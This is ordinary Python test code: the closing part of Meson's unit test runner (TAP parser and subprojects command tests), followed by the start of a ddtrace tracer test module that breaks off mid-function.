class TAPParserTests(unittest.TestCase):
def assert_test(self, events, **kwargs):
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Test(**kwargs))
def assert_plan(self, events, **kwargs):
if 'skipped' not in kwargs:
kwargs['skipped'] = False
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Plan(**kwargs))
def assert_version(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Version(**kwargs))
def assert_error(self, events):
self.assertEqual(type(next(events)), TAPParser.Error)
def assert_bailout(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
def assert_last(self, events):
with self.assertRaises(StopIteration):
next(events)
def parse_tap(self, s):
parser = TAPParser(io.StringIO(s))
return iter(parser.parse())
def parse_tap_v13(self, s):
events = self.parse_tap('TAP version 13\n' + s)
self.assert_version(events, version=13)
return events
def test_empty(self):
events = self.parse_tap('')
self.assert_last(events)
def test_empty_plan(self):
events = self.parse_tap('1..0')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_last(events)
def test_plan_directive(self):
events = self.parse_tap('1..0 # skipped for some reason')
self.assert_plan(events, count=0, late=False, skipped=True,
explanation='for some reason')
self.assert_last(events)
events = self.parse_tap('1..1 # skipped for some reason\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=True,
explanation='for some reason')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('1..1 # todo not supported here\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=False,
explanation='not supported here')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_ok(self):
events = self.parse_tap('ok')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_number(self):
events = self.parse_tap('ok 1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_name(self):
events = self.parse_tap('ok 1 abc')
self.assert_test(events, number=1, name='abc', result=TestResult.OK)
self.assert_last(events)
def test_one_test_not_ok(self):
events = self.parse_tap('not ok')
self.assert_test(events, number=1, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_one_test_todo(self):
events = self.parse_tap('not ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_one_test_skip(self):
events = self.parse_tap('ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
def test_one_test_skip_failure(self):
events = self.parse_tap('not ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
self.assert_last(events)
def test_many_early_plan(self):
events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
self.assert_plan(events, count=4, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_many_late_plan(self):
events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_plan(events, count=4, late=True)
self.assert_last(events)
def test_directive_case(self):
events = self.parse_tap('ok 1 abc # skip')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_directive_explanation(self):
events = self.parse_tap('ok 1 abc # skip why')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
explanation='why')
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo Because')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
explanation='Because')
self.assert_last(events)
def test_one_test_early_plan(self):
events = self.parse_tap('1..1\nok')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_late_plan(self):
events = self.parse_tap('ok\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_out_of_order(self):
events = self.parse_tap('ok 2')
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_middle_plan(self):
events = self.parse_tap('ok 1\n1..2\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=2, late=True)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many_plans(self):
events = self.parse_tap('1..1\n1..2\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=1, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..1\nok 1\nnot ok 2')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..3')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=3, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..3\nok 1\nnot ok 2')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few_bailout(self):
events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_bailout(events, message='no third test')
self.assert_last(events)
def test_diagnostics(self):
events = self.parse_tap('1..1\n# ignored\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_empty_line(self):
events = self.parse_tap('1..1\n\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_unexpected(self):
events = self.parse_tap('1..1\ninvalid\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_version(self):
events = self.parse_tap('TAP version 13\n')
self.assert_version(events, version=13)
self.assert_last(events)
events = self.parse_tap('TAP version 12\n')
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..0\nTAP version 13\n')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_error(events)
self.assert_last(events)
def test_yaml(self):
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_last(events)
class SubprojectsCommandTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.root_dir = Path(self.builddir)
self.project_dir = self.root_dir / 'src'
self._create_project(self.project_dir)
self.subprojects_dir = self.project_dir / 'subprojects'
os.makedirs(str(self.subprojects_dir))
def _create_project(self, path, project_name='dummy'):
os.makedirs(str(path), exist_ok=True)
with open(str(path / 'meson.build'), 'w') as f:
f.write("project('{}')".format(project_name))
def _git(self, cmd, workdir):
return git(cmd, str(workdir), check=True)[1].strip()
def _git_config(self, workdir):
self._git(['config', 'user.name', 'Meson Test'], workdir)
self._git(['config', 'user.email', '[email protected]'], workdir)
def _git_remote(self, cmd, name):
return self._git(cmd, self.root_dir / name)
def _git_local(self, cmd, name):
return self._git(cmd, self.subprojects_dir / name)
def _git_local_branch(self, name):
# Same as `git branch --show-current` but compatible with older git versions
branch = self._git_local(['rev-parse', '--abbrev-ref', 'HEAD'], name)
return branch if branch != 'HEAD' else ''
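# Note: `git rev-parse --abbrev-ref HEAD` prints the current branch name, or
# the literal string 'HEAD' for a detached checkout, which is why the detached
# case above is normalized to ''.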
def _git_local_commit(self, name, ref='HEAD'):
return self._git_local(['rev-parse', ref], name)
def _git_remote_commit(self, name, ref='HEAD'):
return self._git_remote(['rev-parse', ref], name)
def _git_create_repo(self, path):
self._create_project(path)
self._git(['init'], path)
self._git_config(path)
self._git(['add', '.'], path)
self._git(['commit', '-m', 'Initial commit'], path)
def _git_create_remote_repo(self, name):
self._git_create_repo(self.root_dir / name)
def _git_create_local_repo(self, name):
self._git_create_repo(self.subprojects_dir / name)
def _git_create_remote_commit(self, name, branch):
self._git_remote(['checkout', branch], name)
self._git_remote(['commit', '--allow-empty', '-m', 'initial {} commit'.format(branch)], name)
def _git_create_remote_branch(self, name, branch):
self._git_remote(['checkout', '-b', branch], name)
self._git_remote(['commit', '--allow-empty', '-m', 'initial {} commit'.format(branch)], name)
def _git_create_remote_tag(self, name, tag):
self._git_remote(['commit', '--allow-empty', '-m', 'tag {} commit'.format(tag)], name)
self._git_remote(['tag', tag], name)
def _wrap_create_git(self, name, revision='master'):
path = self.root_dir / name
with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f:
f.write(textwrap.dedent(
'''
[wrap-git]
url={}
revision={}
'''.format(os.path.abspath(str(path)), revision)))
def _wrap_create_file(self, name, tarball='dummy.tar.gz'):
path = self.root_dir / tarball
with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f:
f.write(textwrap.dedent(
'''
[wrap-file]
source_url={}
'''.format(os.path.abspath(str(path)))))
def _subprojects_cmd(self, args):
return self._run(self.meson_command + ['subprojects'] + args, workdir=str(self.project_dir))
def test_git_update(self):
subp_name = 'sub1'
# Create a fake remote git repository and a wrap file. Checks that
# "meson subprojects download" works.
self._git_create_remote_repo(subp_name)
self._wrap_create_git(subp_name)
self._subprojects_cmd(['download'])
self.assertPathExists(str(self.subprojects_dir / subp_name))
self._git_config(self.subprojects_dir / subp_name)
# Create a new remote branch and update the wrap file. Checks that
# "meson subprojects update --reset" checkout the new branch.
self._git_create_remote_branch(subp_name, 'newbranch')
self._wrap_create_git(subp_name, 'newbranch')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
# Update remote newbranch. Checks the new commit is pulled into the existing
# local newbranch. Make sure it does not print a spurious 'git stash' message.
self._git_create_remote_commit(subp_name, 'newbranch')
out = self._subprojects_cmd(['update', '--reset'])
self.assertNotIn('No local changes to save', out)
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
# Update remote newbranch and switch to another branch. Checks that it
# switches the current branch back to newbranch and pulls the latest commit.
self._git_local(['checkout', 'master'], subp_name)
self._git_create_remote_commit(subp_name, 'newbranch')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
# Stage some local changes then update. Checks that local changes got
# stashed.
self._create_project(self.subprojects_dir / subp_name, 'new_project_name')
self._git_local(['add', '.'], subp_name)
self._git_create_remote_commit(subp_name, 'newbranch')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
self.assertTrue(self._git_local(['stash', 'list'], subp_name))
# Create a new remote tag and update the wrap file. Checks that
# "meson subprojects update --reset" checkout the new tag in detached mode.
self._git_create_remote_tag(subp_name, 'newtag')
self._wrap_create_git(subp_name, 'newtag')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), '')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newtag'))
# Create a new remote commit and update the wrap file with the commit id.
# Checks that "meson subprojects update --reset" checkout the new commit
# in detached mode.
self._git_local(['checkout', 'master'], subp_name)
self._git_create_remote_commit(subp_name, 'newbranch')
new_commit = self._git_remote(['rev-parse', 'HEAD'], subp_name)
self._wrap_create_git(subp_name, new_commit)
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), '')
self.assertEqual(self._git_local_commit(subp_name), new_commit)
        # Create a local project that is not in a git repository, then update it
        # with a git wrap. Without --reset it should print an error message and
        # return failure. With --reset it should delete the existing project and
        # clone the new one.
subp_name = 'sub2'
self._create_project(self.subprojects_dir / subp_name)
self._git_create_remote_repo(subp_name)
self._wrap_create_git(subp_name)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self._subprojects_cmd(['update'])
self.assertIn('Not a git repository', cm.exception.output)
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name))
@skipIfNoExecutable('true')
def test_foreach(self):
self._create_project(self.subprojects_dir / 'sub_file')
self._wrap_create_file('sub_file')
self._git_create_local_repo('sub_git')
self._wrap_create_git('sub_git')
self._git_create_local_repo('sub_git_no_wrap')
def ran_in(s):
ret = []
prefix = 'Executing command in '
for l in s.splitlines():
if l.startswith(prefix):
ret.append(l[len(prefix):])
return sorted(ret)
dummy_cmd = ['true']
out = self._subprojects_cmd(['foreach'] + dummy_cmd)
self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git', 'subprojects/sub_git_no_wrap']))
out = self._subprojects_cmd(['foreach', '--types', 'git,file'] + dummy_cmd)
self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git']))
out = self._subprojects_cmd(['foreach', '--types', 'file'] + dummy_cmd)
self.assertEqual(ran_in(out), ['subprojects/sub_file'])
out = self._subprojects_cmd(['foreach', '--types', 'git'] + dummy_cmd)
self.assertEqual(ran_in(out), ['subprojects/sub_git'])
def _clang_at_least(compiler, minver: str, apple_minver: str) -> bool:
"""
    Check that the Clang compiler is at least the specified version, whether AppleClang or regular Clang.
Parameters
----------
compiler:
Meson compiler object
minver: str
Clang minimum version
apple_minver: str
        AppleClang minimum version
Returns
-------
at_least: bool
Clang is at least the specified version
"""
if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler)):
return version_compare(compiler.version, apple_minver)
return version_compare(compiler.version, minver)
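# Usage sketch (hypothetical version strings): skip a test unless the detected
# compiler is recent enough, e.g.
#   if not _clang_at_least(cc, '>=10.0', '>=11.0'):
#       raise unittest.SkipTest('requires a newer clang')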
def unset_envs():
# For unit tests we must fully control all command lines
# so that there are no unexpected changes coming from the
# environment, for example when doing a package build.
varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.cflags_mapping.values())
for v in varnames:
if v in os.environ:
del os.environ[v]
def convert_args(argv):
# If we got passed a list of tests, pass it on
pytest_args = ['-v'] if '-v' in argv else []
test_list = []
for arg in argv:
if arg.startswith('-'):
if arg in ('-f', '--failfast'):
arg = '--exitfirst'
pytest_args.append(arg)
continue
# ClassName.test_name => 'ClassName and test_name'
if '.' in arg:
arg = ' and '.join(arg.split('.'))
test_list.append(arg)
if test_list:
pytest_args += ['-k', ' or '.join(test_list)]
return pytest_args
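# For example, convert_args(['AllPlatformTests.test_foo', '-f']) returns
# ['--exitfirst', '-k', 'AllPlatformTests and test_foo'].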
def running_single_tests(argv, cases):
'''
Check whether we only got arguments for running individual tests, not
entire testcases, and not all testcases (no test args).
'''
got_test_arg = False
for arg in argv:
if arg.startswith('-'):
continue
for case in cases:
if not arg.startswith(case):
continue
if '.' not in arg:
# Got a testcase, done
return False
got_test_arg = True
return got_test_arg
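# For example (given the cases defined in main() below):
#   running_single_tests(['AllPlatformTests.test_foo'], cases) -> True
#   running_single_tests(['AllPlatformTests'], cases)          -> False  (whole testcase)
#   running_single_tests([], cases)                            -> False  (run everything)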
def main():
unset_envs()
cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
'TAPParserTests', 'SubprojectsCommandTests',
'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
'WindowsTests', 'DarwinTests']
try:
import pytest # noqa: F401
# Need pytest-xdist for `-n` arg
import xdist # noqa: F401
pytest_args = []
# Don't use pytest-xdist when running single unit tests since it wastes
# time spawning a lot of processes to distribute tests to in that case.
if not running_single_tests(sys.argv, cases):
pytest_args += ['-n', 'auto']
pytest_args += ['./run_unittests.py']
pytest_args += convert_args(sys.argv[1:])
return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
except ImportError:
print('pytest-xdist not found, using unittest instead')
# Fallback to plain unittest.
return unittest.main(defaultTest=cases, buffer=True)
if __name__ == '__main__':
print('Meson build system', mesonbuild.coredata.version, 'Unit Tests')
start = time.monotonic()
try:
raise SystemExit(main())
finally:
print('Total time: {:.3f} seconds'.format(time.monotonic() - start))
|
test_tracer.py
|
# -*- coding: utf-8 -*-
"""
tests for Tracer and utilities.
"""
import contextlib
import multiprocessing
import os
from os import getpid
import threading
from unittest.case import SkipTest
import mock
import pytest
import ddtrace
from ddtrace.constants import ENV_KEY
from ddtrace.constants import HOSTNAME_KEY
from ddtrace.constants import MANUAL_DROP_KEY
from ddtrace.constants import MANUAL_KEEP_KEY
from ddtrace.constants import ORIGIN_KEY
from ddtrace.constants import SAMPLING_PRIORITY_KEY
from ddtrace.constants import VERSION_KEY
from ddtrace.context import Context
from ddtrace.ext import priority
from ddtrace.ext import system
from ddtrace.internal.writer import AgentWriter
from ddtrace.internal.writer import LogWriter
from ddtrace.settings import Config
from ddtrace.tracer import Tracer
from ddtrace.vendor import six
from tests import DummyWriter
from tests import TracerTestCase
from tests import override_global_config
from tests.subprocesstest import run_in_subprocess
from .. import override_env
class TracerTestCases(TracerTestCase):
def test_tracer_vars(self):
span = self.trace("a", service="s", resource="r", span_type="t")
span.assert_matches(name="a", service="s", resource="r", span_type="t")
# DEV: Finish to ensure we don't leak `service` between spans
span.finish()
span = self.trace("a")
span.assert_matches(name="a", service=None, resource="a", span_type=None)
span.finish()
def test_tracer(self):
def _mix():
with self.trace("cake.mix"):
pass
def _bake():
with self.trace("cake.bake"):
pass
def _make_cake():
with self.trace("cake.make") as span:
span.service = "baker"
span.resource = "cake"
_mix()
_bake()
# let's run it and make sure all is well.
self.assert_has_no_spans()
_make_cake()
# Capture root's trace id to assert later
root_trace_id = self.get_root_span().trace_id
# Assert structure of this trace
self.assert_structure(
# Root span with 2 children
dict(name="cake.make", resource="cake", service="baker", parent_id=None),
(
# Span with no children
dict(name="cake.mix", resource="cake.mix", service="baker"),
# Span with no children
dict(name="cake.bake", resource="cake.bake", service="baker"),
),
)
# do it again and make sure it has new trace ids
self.reset()
_make_cake()
self.assert_span_count(3)
for s in self.spans:
assert s.trace_id != root_trace_id
def test_tracer_wrap(self):
@self.tracer.wrap("decorated_function", service="s", resource="r", span_type="t")
def f(tag_name, tag_value):
# make sure we can still set tags
span = self.tracer.current_span()
span.set_tag(tag_name, tag_value)
f("a", "b")
self.assert_span_count(1)
span = self.get_root_span()
span.assert_matches(
name="decorated_function",
service="s",
resource="r",
span_type="t",
meta=dict(a="b"),
)
def test_tracer_pid(self):
with self.trace("root") as root_span:
with self.trace("child") as child_span:
pass
# Root span should contain the pid of the current process
root_span.assert_metrics({system.PID: getpid()}, exact=False)
# Child span should not contain a pid tag
child_span.assert_metrics(dict(), exact=True)
def test_tracer_wrap_default_name(self):
@self.tracer.wrap()
def f():
pass
f()
self.assert_structure(dict(name="tests.tracer.test_tracer.f"))
def test_tracer_wrap_exception(self):
@self.tracer.wrap()
def f():
raise Exception("bim")
with self.assertRaises(Exception) as ex:
f()
self.assert_structure(
dict(
name="tests.test_tracer.f",
error=1,
meta={
"error.msg": ex.message,
"error.type": ex.__class__.__name__,
},
),
)
def test_tracer_wrap_multiple_calls(self):
@self.tracer.wrap()
def f():
pass
f()
f()
self.assert_span_count(2)
assert self.spans[0].span_id != self.spans[1].span_id
def test_tracer_wrap_span_nesting_current_root_span(self):
@self.tracer.wrap("inner")
def inner():
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
@self.tracer.wrap("outer")
def outer():
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
with self.trace("mid"):
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
inner()
outer()
def test_tracer_wrap_span_nesting(self):
@self.tracer.wrap("inner")
def inner():
pass
@self.tracer.wrap("outer")
def outer():
with self.trace("mid"):
inner()
outer()
self.assert_span_count(3)
self.assert_structure(
dict(name="outer"),
((dict(name="mid"), (dict(name="inner"),)),),
)
def test_tracer_wrap_class(self):
class Foo(object):
@staticmethod
@self.tracer.wrap()
def s():
return 1
@classmethod
@self.tracer.wrap()
def c(cls):
return 2
@self.tracer.wrap()
def i(cls):
return 3
f = Foo()
self.assertEqual(f.s(), 1)
self.assertEqual(f.c(), 2)
self.assertEqual(f.i(), 3)
self.assert_span_count(3)
self.spans[0].assert_matches(name="tests.tracer.test_tracer.s")
self.spans[1].assert_matches(name="tests.tracer.test_tracer.c")
self.spans[2].assert_matches(name="tests.tracer.test_tracer.i")
def test_tracer_wrap_factory(self):
def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
with tracer.trace("wrap.overwrite") as span:
span.set_tag("args", args)
span.set_tag("kwargs", kwargs)
return fn(*args, **kwargs)
@self.tracer.wrap()
def wrapped_function(param, kw_param=None):
self.assertEqual(42, param)
self.assertEqual(42, kw_param)
# set the custom wrap factory after the wrapper has been called
self.tracer.configure(wrap_executor=wrap_executor)
# call the function expecting that the custom tracing wrapper is used
wrapped_function(42, kw_param=42)
self.assert_span_count(1)
self.spans[0].assert_matches(
name="wrap.overwrite",
meta=dict(args="(42,)", kwargs="{'kw_param': 42}"),
)
def test_tracer_wrap_factory_nested(self):
def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
with tracer.trace("wrap.overwrite") as span:
span.set_tag("args", args)
span.set_tag("kwargs", kwargs)
return fn(*args, **kwargs)
@self.tracer.wrap()
def wrapped_function(param, kw_param=None):
self.assertEqual(42, param)
self.assertEqual(42, kw_param)
# set the custom wrap factory after the wrapper has been called
self.tracer.configure(wrap_executor=wrap_executor)
# call the function expecting that the custom tracing wrapper is used
with self.trace("wrap.parent", service="webserver"):
wrapped_function(42, kw_param=42)
self.assert_structure(
dict(name="wrap.parent", service="webserver"),
(dict(name="wrap.overwrite", service="webserver", meta=dict(args="(42,)", kwargs="{'kw_param': 42}")),),
)
def test_tracer_disabled(self):
self.tracer.enabled = True
with self.trace("foo") as s:
s.set_tag("a", "b")
self.assert_has_spans()
self.reset()
self.tracer.enabled = False
with self.trace("foo") as s:
s.set_tag("a", "b")
self.assert_has_no_spans()
def test_unserializable_span_with_finish(self):
try:
import numpy as np
except ImportError:
raise SkipTest("numpy not installed")
# a weird case where manually calling finish with an unserializable
        # span was causing a loop of serialization.
with self.trace("parent") as span:
span.metrics["as"] = np.int64(1) # circumvent the data checks
span.finish()
def test_tracer_disabled_mem_leak(self):
# ensure that if the tracer is disabled, we still remove things from the
# span buffer upon finishing.
self.tracer.enabled = False
s1 = self.trace("foo")
s1.finish()
p1 = self.tracer.current_span()
s2 = self.trace("bar")
self.assertIsNone(s2._parent)
s2.finish()
self.assertIsNone(p1)
def test_tracer_global_tags(self):
s1 = self.trace("brie")
s1.finish()
self.assertIsNone(s1.get_tag("env"))
self.assertIsNone(s1.get_tag("other"))
self.tracer.set_tags({"env": "prod"})
s2 = self.trace("camembert")
s2.finish()
self.assertEqual(s2.get_tag("env"), "prod")
self.assertIsNone(s2.get_tag("other"))
self.tracer.set_tags({"env": "staging", "other": "tag"})
s3 = self.trace("gruyere")
s3.finish()
self.assertEqual(s3.get_tag("env"), "staging")
self.assertEqual(s3.get_tag("other"), "tag")
def test_global_context(self):
# the tracer uses a global thread-local Context
span = self.trace("fake_span")
ctx = self.tracer.get_call_context()
assert ctx.trace_id == span.trace_id
assert ctx.span_id == span.span_id
def test_tracer_current_span(self):
# the current span is in the local Context()
span = self.trace("fake_span")
assert self.tracer.current_span() == span
span.finish()
with self.trace("fake_span") as span:
assert self.tracer.current_span() == span
def test_tracer_current_span_missing_context(self):
self.assertIsNone(self.tracer.current_span())
def test_tracer_current_root_span_missing_context(self):
self.assertIsNone(self.tracer.current_root_span())
def test_default_provider_get(self):
# Tracer Context Provider must return a Context object
# even if empty
ctx = self.tracer.context_provider.active()
assert isinstance(ctx, Context)
def test_default_provider_set(self):
# The Context Provider can set the current active Context;
# this could happen in distributed tracing
ctx = Context(trace_id=42, span_id=100)
self.tracer.context_provider.activate(ctx)
span = self.trace("web.request")
span.assert_matches(name="web.request", trace_id=42, parent_id=100)
def test_start_span(self):
# it should create a root Span
span = self.tracer.start_span("web.request")
assert span.name == "web.request"
assert span.parent_id is None
span.finish()
spans = self.pop_spans()
assert len(spans) == 1
assert spans[0] is span
def test_start_span_optional(self):
# it should create a root Span with arguments
with self.start_span("web.request", service="web", resource="/", span_type="http") as span:
pass
span.assert_matches(
name="web.request",
service="web",
resource="/",
span_type="http",
)
def test_start_span_service_default(self):
span = self.start_span("")
span.assert_matches(service=None)
span.finish()
def test_start_span_service_from_parent(self):
with self.start_span("parent", service="mysvc") as parent:
with self.start_span("child", child_of=parent) as child:
pass
child.assert_matches(
name="child",
service="mysvc",
)
def test_start_span_service_global_config(self):
        # When no service is provided, the default from the global config should be used
with self.override_global_config(dict(service="mysvc")):
with self.start_span("") as span:
span.assert_matches(service="mysvc")
def test_start_span_service_global_config_parent(self):
# Parent should have precedence over global config
with self.override_global_config(dict(service="mysvc")):
with self.start_span("parent", service="parentsvc") as parent:
with self.start_span("child", child_of=parent) as child:
pass
child.assert_matches(
name="child",
service="parentsvc",
)
def test_start_child_span(self):
# it should create a child Span for the given parent
with self.start_span("web.request") as parent:
assert self.tracer.current_span() is None
with self.start_span("web.worker", child_of=parent) as child:
assert self.tracer.current_span() is None
parent.assert_matches(
name="web.request",
parent_id=None,
_parent=None,
tracer=self.tracer,
)
child.assert_matches(
name="web.worker",
parent_id=parent.span_id,
_parent=parent,
tracer=self.tracer,
)
def test_start_child_span_attributes(self):
# it should create a child Span with parent's attributes
with self.start_span("web.request", service="web", resource="/", span_type="http") as parent:
with self.start_span("web.worker", child_of=parent) as child:
child.assert_matches(name="web.worker", service="web")
def test_start_child_from_context(self):
# it should create a child span with a populated Context
with self.start_span("web.request") as root:
with self.start_span("web.worker", child_of=root.context) as child:
pass
child.assert_matches(
name="web.worker",
parent_id=root.span_id,
trace_id=root.trace_id,
_parent=root,
tracer=self.tracer,
)
def test_adding_services(self):
assert self.tracer._services == set()
with self.start_span("root", service="one") as root:
assert self.tracer._services == set(["one"])
with self.start_span("child", service="two", child_of=root):
pass
assert self.tracer._services == set(["one", "two"])
def test_configure_runtime_worker(self):
        # by default the runtime worker is not started, though the runtime id is set
self.assertIsNone(self.tracer._runtime_worker)
# configure tracer with runtime metrics collection
self.tracer.configure(collect_metrics=True)
self.assertIsNotNone(self.tracer._runtime_worker)
def test_configure_dogstatsd_url_host_port(self):
tracer = Tracer()
tracer.configure(dogstatsd_url="foo:1234")
assert tracer.writer.dogstatsd.host == "foo"
assert tracer.writer.dogstatsd.port == 1234
tracer = Tracer()
writer = AgentWriter()
tracer.configure(writer=writer, dogstatsd_url="foo:1234")
assert tracer.writer.dogstatsd.host == "foo"
assert tracer.writer.dogstatsd.port == 1234
def test_configure_dogstatsd_url_socket(self):
tracer = Tracer()
tracer.configure(dogstatsd_url="unix:///foo.sock")
assert tracer.writer.dogstatsd.host is None
assert tracer.writer.dogstatsd.port is None
assert tracer.writer.dogstatsd.socket_path == "/foo.sock"
tracer = Tracer()
writer = AgentWriter()
tracer.configure(writer=writer, dogstatsd_url="unix:///foo.sock")
assert tracer.writer.dogstatsd.host is None
assert tracer.writer.dogstatsd.port is None
assert tracer.writer.dogstatsd.socket_path == "/foo.sock"
def test_span_no_runtime_tags(self):
self.tracer.configure(collect_metrics=False)
with self.start_span("root") as root:
